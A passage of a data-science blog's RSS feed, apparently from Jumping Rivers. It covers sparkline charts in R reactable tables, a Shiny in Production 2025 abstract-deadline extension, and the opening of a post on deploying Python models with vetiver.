columns (&lt;code&gt;box&lt;/code&gt;, &lt;code&gt;line&lt;/code&gt; and &lt;code&gt;bar&lt;/code&gt;) full of NA values.&lt;/p&gt;
&lt;p&gt;Now on the reactable side, I am again using the &lt;code&gt;reactable&lt;/code&gt; function,
this time with the &lt;code&gt;columns&lt;/code&gt; argument, which takes a “Named list of column
definitions”. For each sparkline column I use &lt;code&gt;colDef&lt;/code&gt;
to supply a &lt;code&gt;cell&lt;/code&gt; function which takes a value and an index argument. Inside it I call the
sparkline function and pass &lt;code&gt;data$values[[index]]&lt;/code&gt; along with the &lt;code&gt;type&lt;/code&gt;
to determine which chart I’d like. You can also set other column preferences in
&lt;code&gt;colDef&lt;/code&gt;; I have used it here to hide the &lt;code&gt;values&lt;/code&gt; column.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sparkline)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;z&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;box&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="230" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/table1.html" alt="reactable table displaying sparkline boxplots and line &amp;amp; bar charts" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h3 id="bullet-chart"&gt;Bullet Chart&lt;/h3&gt;
&lt;p&gt;In our final example, I am again using the &lt;code&gt;iris&lt;/code&gt; data but this time I’m
adding, for each species, the mean and the
range (minimum and maximum) of the Sepal.Length column. These values will
be used to create a &lt;a href="https://www.storytellingwithdata.com/blog/what-is-a-bullet-graph" rel="external"&gt;bullet
graph&lt;/a&gt;.
In a bullet graph, an observed value (the ‘performance’) is compared
against a target value, and an illustration of the data spread (here the
range) is presented. In a given row of the table, the value of
Sepal.Length for a specific iris will be presented as the performance;
the target that this is compared against is the mean for the relevant
species, the maximum will be range1 and the minimum will be range2.&lt;/p&gt;
&lt;p&gt;Creating the reactable table is slightly different from our
previous example, where I just passed a vector of values to the sparkline
function. For a bullet graph I need to pass in a vector of the
form &lt;code&gt;c(target, performance, range1, range2)&lt;/code&gt;. I can access the
values via &lt;code&gt;d$&lt;/code&gt; (or another form of extraction) and specify which row I
need with &lt;code&gt;[[index]]&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; iris &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lower_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)[1],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; upper_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)[2],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bullet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;iris_table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(d, defaultColDef &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Sepal.Length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bullet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mean[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;upper_range[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;lower_range[[index]]), type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bullet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="510" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/table2.html" alt="reactable table displaying iris data and sparkline bullet chart" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;In this blog we have embedded box plots and bar, line and bullet graphs
in reactable tables. Other chart types can be found on the &lt;a href="https://omnipotent.net/jquery.sparkline/#s-about" rel="external"&gt;jQuery
Sparklines website&lt;/a&gt; or
in the previous blog. Stay tuned for the next blog in this series on
using sparkline reactable tables in Shiny apps.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sparkline-reactable/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Abstracts Deadline Extension</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-abstracts-extension/</link><pubDate>Tue, 11 Mar 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-abstracts-extension/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-abstracts-extension/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="call-for-abstracts-deadline-extended"&gt;Call for Abstracts Deadline Extended&lt;/h3&gt;
&lt;p&gt;Good news! We’re extending the deadline for abstract submissions for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2025&lt;/a&gt; by two weeks. You now have until 11:59 PM BST on 3rd April 2025 to submit your proposal.&lt;/p&gt;
&lt;p&gt;This extension gives you extra time to refine your ideas and submit a strong proposal for the conference, which will take place on 8th-9th October 2025 in Newcastle upon Tyne, UK.&lt;/p&gt;
&lt;h3 id="why-submit"&gt;Why Submit?&lt;/h3&gt;
&lt;p&gt;Shiny in Production is the premier event for developers, data scientists, and industry professionals using &lt;a href="https://shiny.posit.co/" rel="external"&gt;{shiny}&lt;/a&gt; in production environments. If you have insights, case studies, or innovative applications of Shiny, this is your chance to share your expertise with the community.&lt;/p&gt;
&lt;h3 id="topics-of-interest"&gt;Topics of Interest&lt;/h3&gt;
&lt;p&gt;We invite abstracts on a wide range of topics, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AI &amp;amp; Machine Learning in Shiny:&lt;/strong&gt; Integrating predictive models, LLMs, and generative AI into Shiny applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shiny for Large Enterprises:&lt;/strong&gt; How big companies successfully deploy and maintain Shiny apps.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Storytelling with Shiny:&lt;/strong&gt; Making complex data insights accessible through compelling visual narratives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shiny vs. Other Web Frameworks:&lt;/strong&gt; A comparison of when and why to choose Shiny over alternatives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Beyond Dashboards / Creative Uses of Shiny:&lt;/strong&gt; Exploring non-traditional applications like simulations, process automation, and interactive reports.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Python:&lt;/strong&gt; Developing Shiny apps in Python.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Testing and Continuous Deployment:&lt;/strong&gt; Best practices for maintaining high-quality applications through automated workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To get an idea of past topics, check out our YouTube channel, where we have playlists of talks from Shiny in Production &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD&amp;amp;si=b2GWgsZ-k5WC8QAD" rel="external"&gt;2022&lt;/a&gt;, &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t&amp;amp;si=BGLJYKWc5ZIGwrUZ" rel="external"&gt;2023&lt;/a&gt; and
&lt;a href="https://www.youtube.com/watch?v=8mLFQUwnU5g&amp;amp;list=PLbARZQfpqIKK3fHYTo__ZY-IIsF2eiE0X" rel="external"&gt;2024&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="submission-guidelines"&gt;Submission Guidelines&lt;/h3&gt;
&lt;p&gt;To submit your abstract, please follow these guidelines:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Abstract length: Up to 250 words.&lt;/li&gt;
&lt;li&gt;Deadline: Submissions must be received by 11:59 PM BST on &lt;del&gt;20th March 2025&lt;/del&gt; 3rd April 2025.&lt;/li&gt;
&lt;li&gt;Submission portal: Submit your abstract &lt;a href="https://jumpingrivers.typeform.com/to/WnGwkqYy" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="important-dates"&gt;Important Dates&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Abstract submission deadline: &lt;del&gt;20th March 2025&lt;/del&gt; 3rd April 2025&lt;/li&gt;
&lt;li&gt;Notification of acceptance: mid-April 2025&lt;/li&gt;
&lt;li&gt;Conference dates: 8th-9th October 2025&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, visit our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-abstracts-extension/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Vetiver: MLOps for Python</title><link>https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/</link><pubDate>Thu, 27 Feb 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This post is the fourth in our series on MLOps with vetiver:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;Vetiver: First steps in
MLOps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;Vetiver: Model
Deployment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;Vetiver: Monitoring Models in
Production&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 4: Vetiver: MLOps for Python (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Parts 1 to 3 introduced the {vetiver} package for R and outlined its
far-reaching applications in MLOps. But did you know that this package
is also available in Python? In this post we will provide a brief
outline of how to get your Python models into production using &lt;a href="https://rstudio.github.io/vetiver-python/stable/" rel="external"&gt;vetiver for
Python&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-vetiver-mlops-python-deployment"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="installation"&gt;Installation&lt;/h2&gt;
&lt;p&gt;Like any other Python package on &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt;, vetiver can
be installed using pip. Let’s set up a virtual environment and install
all of the packages that will be covered in this blog:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv venv/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install vetiver pandas pyjanitor scikit-learn pins
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Check out our &lt;a href="https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/"&gt;previous blog about virtual environments in
Python&lt;/a&gt; for more
details.&lt;/p&gt;
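&lt;p&gt;Note that the name you install with pip is not always the name you import: pyjanitor is imported as &lt;code&gt;janitor&lt;/code&gt; and scikit-learn as &lt;code&gt;sklearn&lt;/code&gt;. As a minimal sketch (the &lt;code&gt;IMPORT_NAMES&lt;/code&gt; mapping and the &lt;code&gt;check_installed&lt;/code&gt; helper are our own illustrative names, not part of vetiver), the following uses only the standard library to check that each package can be found in the active environment:&lt;/p&gt;

```python
from importlib.util import find_spec

# Maps each pip package name to the module name used in an import statement.
# The two differ for pyjanitor and scikit-learn.
IMPORT_NAMES = {
    "vetiver": "vetiver",
    "pandas": "pandas",
    "pyjanitor": "janitor",
    "scikit-learn": "sklearn",
    "pins": "pins",
}


def check_installed(import_names=IMPORT_NAMES):
    """Return a dict of pip package name to True/False (importable or not)."""
    return {
        package: find_spec(module) is not None
        for package, module in import_names.items()
    }


if __name__ == "__main__":
    # Print one status line per package for a quick visual check.
    for package, found in check_installed().items():
        print(f"{package}: {'ok' if found else 'missing'}")
```

&lt;p&gt;Any package reported as missing can be installed with pip inside the activated virtual environment.&lt;/p&gt;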
&lt;h2 id="data"&gt;Data&lt;/h2&gt;
&lt;p&gt;We will be working with the &lt;a href="https://www.kaggle.com/datasets/kumarajarshi/life-expectancy-who/data" rel="external"&gt;World Health Organisation Life
Expectancy&lt;/a&gt;
data, which provides the annual average life expectancy in a number of
countries. This can be downloaded from
&lt;a href="https://www.kaggle.com/" rel="external"&gt;Kaggle&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.kaggle.com/api/v1/datasets/download/kumarajarshi/life-expectancy-who&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(url, compression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;zip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Country Year ... Income composition of resources Schooling&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 0 Afghanistan 2015 ... 0.479 10.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 Afghanistan 2014 ... 0.476 10.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 Afghanistan 2013 ... 0.470 9.9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 Afghanistan 2012 ... 0.463 9.8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 Afghanistan 2011 ... 0.454 9.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [5 rows x 22 columns]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s drop missing data, clean up the column names and select a subset
of the variables to work with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;janitor&lt;/span&gt;
